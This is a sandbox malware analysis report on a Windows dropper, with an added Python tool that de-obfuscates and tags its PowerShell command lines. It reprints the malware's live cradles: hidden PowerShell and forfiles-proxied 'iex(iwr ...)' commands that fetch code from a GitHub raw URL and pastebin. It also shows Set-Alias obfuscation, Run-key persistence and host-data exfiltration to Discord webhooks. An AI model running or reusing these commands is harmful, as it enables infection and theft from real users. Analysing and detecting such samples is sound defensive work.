Windows Analysis Report
OSLdZanXNc.exe

Overview

General Information

Sample name: OSLdZanXNc.exe (renamed because the original name is a hash value)
Original sample name: a40d9f817045b1192d6cfc6a2defd4289d0f8e67c1ad147a7e51d50be8448203.exe
Analysis ID: 1534108
MD5: 98ff253f6f854df7b7f6794a2761dbd1
SHA1: 246ae6060c76a6751b6ba2d9ca0de18e298b5e26
SHA256: a40d9f817045b1192d6cfc6a2defd4289d0f8e67c1ad147a7e51d50be8448203
Tags: exe, Neth3N, user-JAMESWT_MHT

Detection

Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Connects to a pastebin service (likely for C&C)
Powershell creates an autostart link
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to open files direct via NTFS file id
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • OSLdZanXNc.exe (PID: 6820 cmdline: "C:\Users\user\Desktop\OSLdZanXNc.exe" MD5: 98FF253F6F854DF7B7F6794A2761DBD1)
    • conhost.exe (PID: 6828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6904 cmdline: powershell.exe -command start powershell -windowstyle h -args {iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)} MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 7056 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing) MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • attrib.exe (PID: 5692 cmdline: "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
  • forfiles.exe (PID: 1968 cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'" MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
    • conhost.exe (PID: 856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5724 cmdline: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 6988 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • forfiles.exe (PID: 6908 cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'" MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
    • conhost.exe (PID: 7016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4152 cmdline: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 2132 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)" MD5: 04029E121A0CFA5991749937DD22A1D9)
No configs have been found
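The process tree above shows both delivery chains in full: the dropper starting a hidden PowerShell download-and-execute cradle, and forfiles.exe (a signed Windows binary) proxying a second cradle that hides iex and iwr behind Set-Alias, using the value of $env:os (Windows_NT on every NT-based Windows) as one of the alias names, so the cradle reads "WINDOWS_NT pastebin.com/..." instead of "iwr pastebin.com/...". The Python below is an added example, not code from the sample, from its author or from Joe Sandbox: it resolves attacker-defined aliases back to the cmdlets they stand for and tags each command line with the behaviours the signatures above describe. The sample command lines are transcribed from the process tree; the notepad line, the assumed environment table and the tag names are constructed for the example.

```python
"""Triage PowerShell command lines that hide a download cradle behind Set-Alias.

Added example for this report; not code from the sample or from Joe Sandbox.
"""
from __future__ import annotations

import re

# Command lines transcribed from the process tree above, plus one constructed
# benign control line so the tagger can be checked for false positives.
SAMPLE_CMDLINES = [
    "powershell.exe -command start powershell -windowstyle h -args "
    "{iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera"
    "/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)}",
    '"C:\\Windows\\System32\\forfiles.exe" /p c:\\windows\\system32 /m notepad.exe '
    '/c "powershell.exe -command powershell -windowstyle h -command '
    "'sal fatbake calc;sal callit iEx; sal $env:os iWr; "
    "calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'\"",
    '"C:\\Windows\\system32\\attrib.exe" +s +h '
    '"C:\\ProgramData\\Microsoft OneDrive\\FileSync\\BeginSync.lnk"',
    "notepad.exe C:\\Users\\user\\notes.txt",  # constructed benign control
]

# Built-in Windows PowerShell aliases the cradle relies on.
BUILTIN_ALIASES = {"iex": "Invoke-Expression", "iwr": "Invoke-WebRequest"}

# $env:OS is "Windows_NT" on NT-based Windows, so "sal $env:os iWr" defines an
# alias literally named Windows_NT. This is the assumed environment table.
DEFAULT_ENV = {"os": "Windows_NT"}

# Matches "sal NAME TARGET" and "Set-Alias [-Name] NAME [-Value] TARGET".
SET_ALIAS_RE = re.compile(
    r"\b(?:sal|set-alias)\s+(?:-name\s+)?(\$env:\w+|[\w.-]+)\s+(?:-value\s+)?([\w.-]+)",
    re.IGNORECASE,
)
DOWNLOADERS = ("invoke-webrequest", "invoke-restmethod", "downloadstring", "downloadfile")


def resolve_aliases(cmd: str, env: dict[str, str] | None = None) -> tuple[str, dict[str, str]]:
    """Expand attacker-defined aliases to the cmdlets they point at.

    Returns the rewritten command line and the alias map (lower-cased alias
    name -> canonical cmdlet). Alias chains (sal a iex; sal b a) are followed.
    """
    env = DEFAULT_ENV if env is None else env
    aliases: dict[str, str] = {}
    for name, target in SET_ALIAS_RE.findall(cmd):
        if name.lower().startswith("$env:"):
            name = env.get(name[5:].lower(), name)  # alias name taken from an env var
        key = target.lower()
        aliases[name.lower()] = aliases.get(key, BUILTIN_ALIASES.get(key, target))
    expanded = SET_ALIAS_RE.sub("", cmd)  # drop the Set-Alias statements themselves
    # PowerShell command names are case-insensitive, so replace accordingly.
    for name, target in {**aliases, **BUILTIN_ALIASES}.items():
        expanded = re.sub(rf"\b{re.escape(name)}\b", target, expanded, flags=re.IGNORECASE)
    return expanded, aliases


def triage(cmd: str, env: dict[str, str] | None = None) -> dict:
    """Tag one process command line with the behaviours seen in this report."""
    expanded, aliases = resolve_aliases(cmd, env)
    low = expanded.lower()
    tags: set[str] = set()
    if "invoke-expression" in low and any(d in low for d in DOWNLOADERS):
        tags.add("download_and_execute_cradle")
    if any(t in BUILTIN_ALIASES.values() for t in aliases.values()):
        tags.add("set_alias_obfuscation")  # iex/iwr hidden behind a custom alias
    if re.search(r"-windowstyle\s+h(idden)?\b", low):
        tags.add("hidden_window")
    if "forfiles.exe" in low and re.search(r'/c\s+"?powershell', low):
        tags.add("forfiles_proxy_execution")
    if re.search(r'\battrib(\.exe)?"?\s+(\+[sh]\s+)+.*\.lnk', low):
        tags.add("hidden_lnk_via_attrib")
    return {"command": cmd, "expanded": expanded.strip(), "aliases": aliases, "tags": tags}


def triage_all(cmdlines: list[str]) -> list[dict]:
    """Run triage over a list of process-creation command lines."""
    return [triage(c) for c in cmdlines]


if __name__ == "__main__":
    for result in triage_all(SAMPLE_CMDLINES):
        print(sorted(result["tags"]), "<-", result["expanded"][:90])
```

Feeding the forfiles line through resolve_aliases turns the obfuscated tail into Invoke-Expression(Invoke-WebRequest pastebin.com/raw/sA04Mwk2 -usebasicparsing), which is what the two "PowerShell Download and Execution Cradles" Sigma hits above are matching on once the aliases are peeled away. The alias map itself is worth keeping in the alert: a Set-Alias whose target is iex or iwr is a stronger signal than the download URL, which the operator can change at will.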
Source: Process Memory Space: powershell.exe PID: 7056; Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC; Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution; Author: ditekSHen; Strings:
  • 0x6b4f:$b1: ::WriteAllBytes(
  • 0xf254:$b1: ::WriteAllBytes(
  • 0x2a1bf:$b1: ::WriteAllBytes(
  • 0x927b6:$b1: ::WriteAllBytes(
  • 0x152a36:$b1: ::WriteAllBytes(
  • 0x2143bb:$b1: ::WriteAllBytes(
  • 0x8071d:$s1: -join
  • 0x80757:$s1: -join
  • 0x80862:$s1: -join
  • 0x80b51:$s1: -join
  • 0x80b73:$s1: -join
  • 0x80eb0:$s1: -join
  • 0x80ed0:$s1: -join
  • 0x80f02:$s1: -join
  • 0x80f4a:$s1: -join
  • 0x80f77:$s1: -join
  • 0x80f9e:$s1: -join
  • 0x80fc8:$s1: -join
  • 0x8108b:$s1: -join
  • 0x81538:$s1: -join
  • 0x81559:$s1: -join
Source: Process Memory Space: powershell.exe PID: 6988; Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC; Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution; Author: ditekSHen; Strings:
  • 0x9a1c:$b1: ::WriteAllBytes(
  • 0xeb554:$b1: ::WriteAllBytes(
  • 0x93936:$s1: -join
  • 0x9bc8c:$s1: -join
  • 0xd13ac:$s1: -join
  • 0x164a20:$s1: -join
  • 0x1651ba:$s1: -join
  • 0x1605c:$s3: reverse
  • 0x1ffb1:$s3: reverse
  • 0xab752:$s3: reverse
  • 0xb7fa0:$s3: reverse
  • 0x121a7b:$s3: reverse
  • 0x12868a:$s3: reverse
  • 0x12a05d:$s3: reverse
  • 0x1350ae:$s3: reverse
  • 0x1896aa:$s3: reverse
  • 0x189975:$s3: reverse
  • 0x18a045:$s3: reverse
  • 0x18a7fe:$s3: reverse
  • 0x191eff:$s3: reverse
  • 0x192319:$s3: reverse
Source: Process Memory Space: powershell.exe PID: 2132; Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC; Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution; Author: ditekSHen; Strings:
  • 0xe5a94:$b1: ::WriteAllBytes(
  • 0x11ecf1:$b1: ::WriteAllBytes(
  • 0x139cd1:$b1: ::WriteAllBytes(
  • 0x5ecd9:$s1: -join
  • 0x65d67:$s1: -join
  • 0xa2800:$s1: -join
  • 0xa2f60:$s1: -join
  • 0x3aaa:$s3: reverse
  • 0xdb28:$s3: reverse
  • 0x78a40:$s3: reverse
  • 0x8453a:$s3: reverse
  • 0x1596b2:$s3: reverse
  • 0x1599a0:$s3: reverse
  • 0x15a070:$s3: reverse
  • 0x15a829:$s3: reverse
  • 0x161c0c:$s3: reverse
  • 0x162026:$s3: reverse
  • 0x162bae:$s3: reverse
  • 0x16385b:$s3: reverse
  • 0x16f905:$s3: reverse
  • 0x176542:$s3: reverse
Source: amsi64_6988.amsi.csv; Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC; Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution; Author: ditekSHen; Strings:
  • 0x9a92:$b1: ::WriteAllBytes(
  • 0x8197:$s1: -join
  • 0x1943:$s4: +=
  • 0x1a05:$s4: +=
  • 0x5c2c:$s4: +=
  • 0x7d49:$s4: +=
  • 0x8033:$s4: +=
  • 0x8179:$s4: +=
  • 0xc1bc:$s4: +=
  • 0xc23c:$s4: +=
  • 0xc302:$s4: +=
  • 0xc382:$s4: +=
  • 0xc558:$s4: +=
  • 0xc5dc:$s4: +=
  • 0x9b2c:$e4: Get-WmiObject
  • 0x9bce:$e4: Get-WmiObject
  • 0xa6a5:$e4: Get-WmiObject
  • 0xa894:$e4: Get-Process
  • 0xa8ec:$e4: Start-Process
Source: amsi64_2132.amsi.csv; Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC; Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution; Author: ditekSHen; Strings:
  • 0x9a92:$b1: ::WriteAllBytes(
  • 0x8197:$s1: -join
  • 0x1943:$s4: +=
  • 0x1a05:$s4: +=
  • 0x5c2c:$s4: +=
  • 0x7d49:$s4: +=
  • 0x8033:$s4: +=
  • 0x8179:$s4: +=
  • 0xc1bc:$s4: +=
  • 0xc23c:$s4: +=
  • 0xc302:$s4: +=
  • 0xc382:$s4: +=
  • 0xc558:$s4: +=
  • 0xc5dc:$s4: +=
  • 0x9b2c:$e4: Get-WmiObject
  • 0x9bce:$e4: Get-WmiObject
  • 0xa6a5:$e4: Get-WmiObject
  • 0xa894:$e4: Get-Process
  • 0xa8ec:$e4: Start-Process

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: powershell.exe -command start powershell -windowstyle h -args {iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)}, CommandLine: powershell.exe -command start powershell -windowstyle h -args {iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)}, CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\OSLdZanXNc.exe", ParentImage: C:\Users\user\Desktop\OSLdZanXNc.exe, ParentProcessId: 6820, ParentProcessName: OSLdZanXNc.exe, ProcessCommandLine: powershell.exe -command start powershell -windowstyle h -args {iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)}, ProcessId: 6904, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix); Data: Command: powershell.exe -command start powershell -windowstyle h -args {iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)}, CommandLine: powershell.exe -command start powershell -windowstyle h -args {iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)}, CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\OSLdZanXNc.exe", ParentImage: C:\Users\user\Desktop\OSLdZanXNc.exe, ParentProcessId: 6820, ParentProcessName: OSLdZanXNc.exe, ProcessCommandLine: powershell.exe -command start powershell -windowstyle h -args {iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)}, ProcessId: 6904, ProcessName: powershell.exe
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk", EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7056, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive File Sync
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: powershell.exe -command start powershell -windowstyle h -args {iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)}, CommandLine: powershell.exe -command start powershell -windowstyle h -args {iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)}, CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\OSLdZanXNc.exe", ParentImage: C:\Users\user\Desktop\OSLdZanXNc.exe, ParentProcessId: 6820, ParentProcessName: OSLdZanXNc.exe, ProcessCommandLine: powershell.exe -command start powershell -windowstyle h -args {iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)}, ProcessId: 6904, ProcessName: powershell.exe
Source: Process started; Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger; Data: Command: powershell.exe -command start powershell -windowstyle h -args {iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)}, CommandLine: powershell.exe -command start powershell -windowstyle h -args {iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)}, CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\OSLdZanXNc.exe", ParentImage: C:\Users\user\Desktop\OSLdZanXNc.exe, ParentProcessId: 6820, ParentProcessName: OSLdZanXNc.exe, ProcessCommandLine: powershell.exe -command start powershell -windowstyle h -args {iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)}, ProcessId: 6904, ProcessName: powershell.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: powershell.exe -command start powershell -windowstyle h -args {iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)}, CommandLine: powershell.exe -command start powershell -windowstyle h -args {iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)}, CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\OSLdZanXNc.exe", ParentImage: C:\Users\user\Desktop\OSLdZanXNc.exe, ParentProcessId: 6820, ParentProcessName: OSLdZanXNc.exe, ProcessCommandLine: powershell.exe -command start powershell -windowstyle h -args {iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)}, ProcessId: 6904, ProcessName: powershell.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-15T15:54:30.522779+0200 | 2857658 | 1 | A Network Trojan was detected | 192.168.2.12 | 55611 | 162.159.138.232 | 443 | TCP
2024-10-15T15:54:46.501030+0200 | 2857659 | 1 | A Network Trojan was detected | 192.168.2.12 | 55624 | 162.159.138.232 | 443 | TCP
2024-10-15T15:54:53.884821+0200 | 2857659 | 1 | A Network Trojan was detected | 192.168.2.12 | 55625 | 162.159.138.232 | 443 | TCP

Source: unknown; HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.12:49712 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.12:55611 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.12:55614 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.12:55617 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.12:55620 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.12:55622 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.12:55624 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.12:55625 version: TLS 1.2
Source: OSLdZanXNc.exe; Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2601444821.000002422026F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdbll source: powershell.exe, 00000004.00000002.2601146376.000002422022B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\adminalt\Autodesk.AutoCAD.2023.x64.Portable\x64\Release\PePacker.pdb source: OSLdZanXNc.exe
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000004.00000002.2602749668.0000024220650000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2601758086.000002422057E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb& source: powershell.exe, 00000004.00000002.2602273383.00000242205D3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000004.00000002.2601063159.00000242201FF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb source: powershell.exe, 00000004.00000002.2600442487.00000242201DD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbpr source: powershell.exe, 00000004.00000002.2601758086.000002422057E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb34e089" source: powershell.exe, 00000004.00000002.2602273383.000002422061C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdbB source: powershell.exe, 00000004.00000002.2602749668.0000024220650000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000004.00000002.2601758086.000002422057E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2602668444.0000024220629000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2601146376.000002422022B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdbv source: powershell.exe, 00000004.00000002.2602273383.00000242205D3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdbw source: powershell.exe, 00000004.00000002.2600442487.00000242201DD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb? source: powershell.exe, 00000004.00000002.2600442487.00000242201DD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbA59A source: powershell.exe, 00000004.00000002.2601146376.000002422022B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\adminalt\Autodesk.AutoCAD.2023.x64.Portable\x64\Release\PePacker.pdb) source: OSLdZanXNc.exe
Source: Binary string: ws\dll\System.Management.Automation.pdb| source: powershell.exe, 00000004.00000002.2601146376.000002422022B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\dll\System.Management.Automation.pdb[ source: powershell.exe, 00000004.00000002.2601146376.000002422022B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\Microsoft.PowerShell.Commands.Utility.pdbpdbity.pdb source: powershell.exe, 00000004.00000002.2602749668.0000024220650000.00000004.00000020.00020000.00000000.sdmp

Networking

Source: Network traffic; Suricata IDS: 2857658 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Registration : 192.168.2.12:55611 -> 162.159.138.232:443
Source: Network traffic; Suricata IDS: 2857659 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil : 192.168.2.12:55624 -> 162.159.138.232:443
Source: Network traffic; Suricata IDS: 2857659 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil : 192.168.2.12:55625 -> 162.159.138.232:443
Source: unknown; DNS query: name: pastebin.com
Source: Joe Sandbox View; IP Address: 104.20.4.235
Source: Joe Sandbox View; IP Address: 104.20.4.235
Source: Joe Sandbox View; IP Address: 162.159.138.232
Source: Joe Sandbox View; ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View; ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View; ASN Name: FASTLYUS
Source: Joe Sandbox View; JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global traffic; HTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682; Host: raw.githubusercontent.com; Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: POST /api/webhooks/1295171900019966004/KRGDAVzqdqMZILdh_WVWyqLwT2_aVjXOXnoEnaoZ5xZY_kNOmMNm2yrdQTKMOzXSXWSI HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682; Content-Type: application/json; Host: discord.com; Content-Length: 217; Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682; Host: pastebin.com; Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682; Host: raw.githubusercontent.com; Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682; Host: pastebin.com; Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682; Host: raw.githubusercontent.com; Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682; Content-Type: application/json; Host: discord.com; Content-Length: 298; Connection: Keep-Alive
